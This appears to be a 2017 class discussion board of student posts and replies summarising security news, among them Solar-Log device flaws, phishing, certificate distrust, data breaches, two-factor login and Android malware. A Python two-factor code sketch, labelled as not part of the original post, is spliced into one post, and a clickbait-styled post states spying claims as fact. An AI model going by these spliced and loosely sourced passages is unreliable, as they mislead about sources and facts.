Several potentially serious vulnerabilities were discovered in a solar park monitoring system. The solar park monitoring system is known for solutions for energy meter monitoring and solar power generator monitoring applications. The infected company says its products have been used to monitor more than 260,00 solar plants worldwide.
An advisory published on Wednesday by SEC Consult shows that the firm has identified a total of seven vulnerabilities. The security holes have been discovered after testing Solar-Log 1200 devices running firmware version 3.5.2-85 and Solar-Log 800e with firmware version 2.8.4-56. Another flaw allows an unauthenticated attacker to upload arbitrary files to the Solar-Log system using specially crafted POST requests. Another vulnerability is that the hackers are allowed to obtain potentially sensitive information with the flaw of IPC@CHIP.
The vendor claimed that they have reacted fast to address the issue with the release of the newest firmware version. However, SEC had no clue to confirm that all flaws have been patched properly. Further investigation will be conducted.
March 26, 2017 at 8:04 pm
Good post, Yu Ming,
Other vulnerabilities are related to the Beck IPC@CHIP embedded controller used by the Solar-Log monitoring devices. One of these flaws, known since 2001 (CVE-2001-1341), allows an attacker to obtain potentially sensitive information on the network configuration.
Other IPC@CHIP-related bugs can be exploited to change network configurations, cause a denial-of-service (DoS) condition, and reprogram the device’s flash memory. While some of the flaws may exist due to outdated IPC@CHIP software/firmware, SEC Consult pointed out that some attacks are possible because Solar-Log has failed to implement password protection functionality made available by Beck.
The information disclosure, CSRF and arbitrary file upload vulnerabilities can be exploited over the Internet in most cases, while the other weaknesses can be exploited by an attacker with network access to the devices, SEC Consult told SecurityWeek.
March 26, 2017 at 4:47 pm
Smart TV Manufacturers Do NOT Want You To See This Youtube Video.
I was very impressed when I watched this YouTube video that talks about how intelligence agencies can use our appliances at home to watch us and see what we do.
Smart TVs became dangerous weapons to watch what you do inside your house. The CIA can install malware in your smart TV to use your TV’s camera and microphone to hear and see what you do in your own house, according to WikiLeaks. Your TV being plugged in to the power is all the CIA needs to watch you, and the camera doesn’t even turn on the notification light during the bugging process.
So many people believe the CIA does hack people’s TVs and probably computers to fight against terrorist activities. It’s very funny: instead of you watching your TV, it’s watching you.
March 26, 2017 at 5:27 pm
Hi Younes, it is a very interesting post. I didn’t know some TVs nowadays are as advanced as having a built-in camera. I have seen people covering up their laptops’ cameras with a piece of tape to prevent being monitored by the CIA or FBI because they want your information and what is going on with your life. I believe there are a number of ways that someone can gain access to any built-in camera, but the manufacturers hold part of the responsibility to ensure users’ privacy.
March 26, 2017 at 6:58 pm
Wow, it’s an interesting video. We heard that your smart phone or your laptop could be a spying tool, but if the spying tool turns out to be a smart TV, it is still a new thing. So I wonder if the smart TV is a perfect spying tool? Generally speaking, smart TVs are less likely to receive proper security support. This is in part because users don’t even have the awareness that they could be spied on by their smart TV! So they are less likely to use security practices when it comes to their TV, such as changing passwords, updating regularly, or installing paid antivirus software.
March 26, 2017 at 7:06 pm
It’s very interesting you brought this up. I agree with you that it’s kind of ironic that instead of you watching the TV, your TV is watching you. I am okay with being monitored over phone conversations for investigating terrorists’ activities, but not with someone watching what I am actually doing. I believe installing malware on a TV strongly invades people’s privacy.
March 27, 2017 at 12:27 am
This is indeed interesting. I’ve heard of spying through laptop webcams but not smart TVs. I guess when everything is turning to IT, cyberattacks can come from just about anywhere.
April 9, 2017 at 4:57 pm
How mad will we be when we find out the manufacturers built back doors into all our gear in concert with “intelligence” services? We didn’t just let them in the front door, we paid thousand dollars for it and installed our surveillance ourselves.
Neil Y. Rushi says
March 26, 2017 at 5:12 pm
Phishing in Gmail
Phishers are using techniques to keep Gmail users from knowing they are falling into a phishing trap. This is done by disguising it as a legit sign-in page. When users log in, the phishers can grab the credentials and use them for malicious activities. This is dangerous especially for those with privileges that carry sensitive because the phishing technique also hits other Google products such as PDF. Google is using machine learning-based detection to track patterns of this phishing technique. Also, Google is helping administrators provide employees of organizations with security keys as an authentication method. But it’s hard to predict and learn all techniques because phishers always change it up and invent new ideas.
March 27, 2017 at 12:25 am
Interesting. As we know, Temple also uses a similar feature where you access your Gmail through a Temple portal. Unsuspecting users who are used to this kind of feature may fall victim to the phishing attempt you mentioned, especially the newly employed.
Abhay V Kshirsagar says
Google has stopped trusting Symantec-Issued certificates
Symantec failed to make sure that its partners properly issue digital certificates, and thus Google is not pleased and has announced that it will gradually stop trusting all of the organization’s existing certificates in its browser Chrome.
In 2015, Google caught Symantec and its subsidiaries and WebTrust audited partners issuing certificates wrongly and had notified Symantec to resolve an issue that was caused after a subsidiary certificate authority (CA) issued unauthorized google.com certificates. Recently, Symantec’s GeoTrust and Thawte were found to have wrongly issued over a hundred certificates like test.com, example.com.
According to Ryan Sleevi, a software engineer at Google, Symantec’s partners misused at least 30,000 certificates in the past years. Further, these certificates were issued by CrossCert, Certisign Certificatadora Digital, Certisur S.A and Certsuperior S.
Symantec did authorize the aforementioned companies to perform validation for certificate information but did not thoroughly audit them. According to the Baseline Requirements, Symantec is liable for any issues caused by this. Also, there is no way to tell the difference between a certificate validated by Symantec and one validated by its partners.
Adam M Joskowicz says
March 26, 2017 at 5:16 pm
New brain-inspired cyber security system detects ‘bad apples’ 100 times faster
Cyber Security is critical for national security, corporations, and private individuals. The Neuromorphic Cyber Microscope can look for the complex patterns that indicate specific ‘bad apples’. It can do this all while using less electricity than a standard 60-watt light bulb, due to its brain-inspired design. The Neuromorphic Cyber Microscope, an R&D100 Awards finalist this year, is in the early stages of deployment. It is more than 100 times faster and 1,000 times more energy efficient than racks of conventional cyber security systems. The brain inspiration leads to faster and more efficient threat detection. Both the NCM and the human brain continually scan for threats. “A hose or stick can cause you to jump, even if you’re not searching for a snake. Similarly, the NCM compares streaming data to suspicious patterns in a time-dependent manner.” This technology is taking a giant step in the cyber security world.
March 26, 2017 at 6:00 pm
America’s JobLink Suffers Security Breach
America’s JobLink (AJL) was recently the victim of a security breach when a hacker exploited a flaw in its application code to gain unauthorized access to information of job seekers in 10 states. AJL, a multi-state system which links job seekers with employers, has since identified and eliminated the code misconfiguration.
AJL said on March 21 that names, birthdates, and Social Security Numbers of applicants from Alabama, Arizona, Arkansas, Idaho, Delaware, Illinois, Kansas, Maine, Oklahoma, and Vermont were illegally accessed by an outside source. It explained that the code misconfiguration was introduced into the system through an update last October.
AJL is currently working with the FBI to apprehend the hacker while a forensic firm is carrying out a detailed examination of the hacked accounts.
March 26, 2017 at 8:10 pm
Thanks for sharing, Minghu.
About 1.4 million job seekers in Illinois may have had their personal information compromised when one of the state’s employment security agency vendors was hacked, the governor’s office said Friday. The hacker may have accessed the names, Social Security numbers and birth dates of job seekers in the vendor’s database. The Illinois Department of Employment Security notified the state’s General Assembly about the hack, Gov. Bruce Rauner’s administration said.
March 26, 2017 at 6:46 pm
Instagram Adds Two-Factor Authentication
Instagram became the latest in a long line of services over the years to offer users two-factor authentication this week.
Kevin Systrom, co-founder and CEO of the Facebook-owned mobile photo-sharing app announced the feature on its blog Thursday afternoon. With the feature – accessible via Settings -> Two-Factor Authentication – users will be prompted to enter a code, delivered via SMS, every time they log in.
At first glance Instagram’s two-factor authentication mechanism is slightly more intuitive than others. Upon turning the feature on, Instagram also supplies users with five different backup security codes in case a user can’t receive a security code by text. The codes – sets of eight digits – can also be used if a user’s phone has been stolen, compromised, or misplaced. The service automatically saves a screenshot of the codes to the user’s Photos section of their phone and also allows users to copy the codes to the device’s clipboard.
Two-factor authentication has become fairly ubiquitous over the last several years. Google was one of the first companies to deploy it when it added a two-factor mechanism to its Google Apps offerings way back in 2010. Facebook introduced its version, Login Approvals, in 2011; Twitter added a mechanism for 2FA in 2013.
Given Facebook’s robust security settings, it was about time that Instagram, which Facebook acquired for $1 billion back in 2012, caught up. Many social media sites, Facebook in particular, have been keen on giving users an increasing number of options when it comes to logging into their services securely.
The company unveiled Code Generator, part of Login Approvals, several years ago. The service randomly generates six-digit security codes every 30 seconds that users can enter to access their account in the event they don’t have mobile service. The service can also be used to reset a user’s password. The company began offering users another service, Delegated Recovery, earlier this year. The feature gives users a mechanism similar to 2FA to set up an encrypted recovery token for sites like GitHub, and store it with Facebook.
“An email address alone can’t provide the same level of two-factor authentication to recover access,” Facebook security engineer Brad Hill said of the feature at the time.
Earlier this year the company began allowing users to tie a physical security key, like a Yubikey, to their accounts, for an added layer of security, as well.
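The two mechanisms described in the post above, six-digit codes that change every 30 seconds and a small set of eight-digit single-use backup codes, as an added example that is not part of the original post. The post does not say which algorithm Facebook or Instagram use; this sketch assumes the standard TOTP construction from RFC 6238, and the class and method names are hypothetical.

```python
import hashlib
import hmac
import secrets
import struct

STEP_SECONDS = 30   # code lifetime, as in the post
TOTP_DIGITS = 6     # six-digit codes, as in the post
BACKUP_CODES = 5    # five backup codes of eight digits, as in the post


def totp(secret: bytes, now: float, digits: int = TOTP_DIGITS) -> str:
    """RFC 6238 time-based code (HMAC-SHA1 with dynamic truncation)."""
    counter = struct.pack(">Q", int(now) // STEP_SECONDS)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


class SecondFactor:
    """Server-side state for one account (hypothetical helper class)."""

    def __init__(self, secret: bytes):
        self.secret = secret
        self.last_used_step = -1      # blocks replay of an accepted code
        self._backup_hashes = set()

    def issue_backup_codes(self):
        """Create fresh backup codes; the plaintext is shown to the user once."""
        codes = [f"{secrets.randbelow(10 ** 8):08d}" for _ in range(BACKUP_CODES)]
        # Hashing only keeps the plaintext out of storage. Eight digits are
        # guessable, so attempt rate limiting is still required around this.
        self._backup_hashes = {hashlib.sha256(c.encode()).hexdigest() for c in codes}
        return codes

    def verify_totp(self, code: str, now: float) -> bool:
        """Accept the current code or a neighbour (clock drift), once only."""
        if not (code.isascii() and code.isdigit()):
            return False
        current = int(now) // STEP_SECONDS
        for step in (current - 1, current, current + 1):
            if step <= self.last_used_step:
                continue              # already used, or older than one used
            expected = totp(self.secret, step * STEP_SECONDS)
            if hmac.compare_digest(expected, code):
                self.last_used_step = step
                return True
        return False

    def redeem_backup_code(self, code: str) -> bool:
        """A backup code works exactly once, then it is discarded."""
        digest = hashlib.sha256(code.encode()).hexdigest()
        if digest in self._backup_hashes:
            self._backup_hashes.remove(digest)
            return True
        return False


if __name__ == "__main__":
    demo = SecondFactor(b"12345678901234567890")  # RFC 6238 test secret
    print(totp(demo.secret, 59), demo.issue_backup_codes())
```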
March 26, 2017 at 10:13 pm
Hey Zhengshu, thanks for sharing this article about the current update on Instagram! Even though I am not an Instagram user, offering the two factor authentication is definitely a smart move to protect the users. As you said, it added another layer of security, the users also can easily recover their passwords through the token sent via phone or email.
March 26, 2017 at 7:56 pm
New Android trojan mimics user clicks to download dangerous malware
Android users have been exposed to a new malicious app imitating Adobe Flash Player that serves as a potential entrance for many types of dangerous malware. The application, detected by ESET security software as Android/TrojanDownloader.Agent.JI, tricks its victims into granting it special permissions in the Android accessibility menu and uses these to download and execute additional malware of the attackers’ choice.
According to our analysis, the trojan targets devices running Android, including the latest versions. It is distributed via compromised websites – adult video sites, but also via social media. Under the pretense of safety measures, the websites lure users into downloading a fake Adobe Flash Player update. If victims fall for the legitimate-looking update screen and run the installation, they have more deceptive screens to look forward to.
Fangzhou Hou says
March 26, 2017 at 7:57 pm
“Third-Party App Store Slips Inside iOS App Store”
A third-party app store application managed to slip into the official iOS App Store by masquerading as a legitimate financial helper application, according to Trend Micro researchers.
Dubbed “Household Accounts App” and claiming to be a financial helper app for families, the application is designed with Japanese characters, but the app store it leads to is written in Mandarin Chinese. The researcher discovered the program in the App Store of multiple countries and couldn’t determine exactly who it targets.
When launched for the first time, the application checks the PPAASSWOpenKey key in the system’s user preference plist, which allows it to determine if it has run before, because the key doesn’t exist if it hasn’t, the researchers explain. Next, the app switches to the else branch, which requests the right to use data to access the third-party store, but the user has to approve the request.
The third-party store can be used to install not only applications in the official iOS App Store, but also those that are distributed via unofficial channels, thus potentially exposing users to mobile malware and other unwanted applications. One of the programs distributed via this portal is “PG Client,” a tool for jailbreaking iOS devices.
In addition to this third-party store, the security researchers found a program designed to promote applications already in the App Store. Dubbed “LoveApp”, the software could bypass Apple’s arrangement of apps in searches and the paid Search Ads option and could create revenue by charging developers looking to promote apps without using Apple’s promotion service.
Paul M. Dooley says
March 26, 2017 at 9:58 pm
The amount of events that occur in a typical enterprise environment may seem like an infinite amount to some. One of the biggest challenges in IT security is being able to identify threats and attacks as they occur and not just be reactive in nature and take action once a breach has occurred, if you’re lucky months after the fact, but more likely years after the fact as we’ve seen in recent cases such as the Yahoo breach and many others I could reference. This is where SIEM solutions (Security Information and Event Management) have been adopted, such as the market leader, Splunk, which we are about to dive into this half of the semester. This gave Info-Sec professionals the unique ability to be more proactive in their fight against attacks and be able to make intelligent decisions based on the various events that have been being logged forever but the amount of data to sift through may as well have made it unusable. SIEM allowed people to pump all that aggregated data into the system and the output would be functional information that would identify threats and you could take intelligent actions against an attack that otherwise would have been lost unless you got lucky finding a trace of an attack where the analogy of needle in a haystack doesn’t give justice. As instrumental in the battle between good and bad as SIEM solutions have been, there apparently is a gap with specific types of attacks as they’ve become more sophisticated, which has been and will be the tale of cat and mouse between technology good guys and bad guys. For example, SIEM solutions are not effective in identifying identity-based threats, such as hackers impersonating people on corporate networks, or rogue employees stealing data. This is a common problem with any type of information security solution though. The good guys are always going to be 1 step behind the bad guys. Until a new attack happens, no one is investing in a solution to prevent them from happening.
Experts are saying that the main weakness with the current state of SIEM is that it relies on a dedicated team to maximize the effectiveness of this tool. The market is asking for more artificial intelligence to be built into the tool to make it more effective and more effective against more threats. IoT is a threat because while our computer systems are pretty well locked down in most enterprises that invest and care of information security because it creates an avenue to access the network through these connected devices such as cameras, bluetooth tools, etc. Also, while SIEM has opened up the ability to interpret massive amounts of data, the combination of Cloud and IoT means that it will need to keep growing to be able to handle substantially more amounts of data and need a never-ending supply of bandwidth to do so.
March 26, 2017 at 11:21 pm
“UK: Attacker used WhatsApp, firm must help police get access”
WhatsApp took a lot of heat for not encrypting their users’ messages and implemented it in all communications last year. This has now created an issue where the recent terrorist attacker in the U.K. was found to have sent a message using WhatsApp recently. The attacker was shot dead at the scene so he cannot be asked to unlock the messages. Home Secretary Amber Rudd went on television to request that all companies enable a backdoor for intelligence agencies.
This parallels similar cases such as the FBI trying to crack the iPhone of the San Bernardino attacker. The FBI was going to force Apple to break the phone’s encryption but was able to hire a firm to access the content another way.
The British attacker is believed to have been a lone attacker but the messages could show if he had help or not as accomplices may flee the country or attempt attacks of their own potentially.
March 27, 2017 at 12:15 am
Security Improvements Make Android More Attractive to Business
Accepting Android as a staff BYOD (Bring Your Own Device) option has always been tempered by security officers’ understanding that it is less secure than iOS. In the last year, Google has made serious efforts to reduce that perception. The Android Security 2016 Year in Review report (PDF), published this week by Google, describes two areas the company has particularly improved Android security: updates, and the elimination of malicious apps.
Security updates, or patches, have always been a problem in the Android ecosphere. The difficulty is the sheer number of different Android manufacturers involved; some of whom rarely distribute the monthly updates provided by Google. Over the last year, Google has worked on improving this. It has concentrated on two areas: improving the discovery and responsible disclosure of vulnerabilities in its partners’ products; and improving the speed and regularity of device patching.
It has achieved what can be described as partial success. “As of December 2016,” says the report, “735 million Android devices report a 2016 security patch level.” The downside is it still leaves a similar number that did not. Nevertheless, “Over the course of the year, Android device manufacturers became more efficient at delivering monthly security updates, including expanding their security programs to accept and address security vulnerabilities specific to their devices.”
New models of Google’s own products, Pixel and Nexus, and several of the major manufacturers such as Samsung and LG, have introduced automatic updating. At the end of 2016, Android 7.1.1 introduced new features to improve updating generally with automatic updates.
Google also improved its ability to detect and remove potentially harmful apps (PHAs), such as trojans, spyware and phishing apps, both on the device and from within the Google Play Store. “The goal,” says Google, “is to provide the right protection at the moment it is needed by the user.” During 2016, Google’s security services performed over 790 million device security scans daily, covering phones, tablets, watches and TVs. This is up from around 450 million in the previous year.
Similar attention is given to the apps in Google Play, and PHA installations from Play have fallen dramatically: trojan installs fell by 51.5%, hostile downloaders by 54.6%, backdoors by 30.5%, and phishing apps by 73.4%. “By the end of 2016,” claims Google, “only 0.05 percent of devices that downloaded apps exclusively from Play contained a PHA; down from 0.15 percent in 2015.”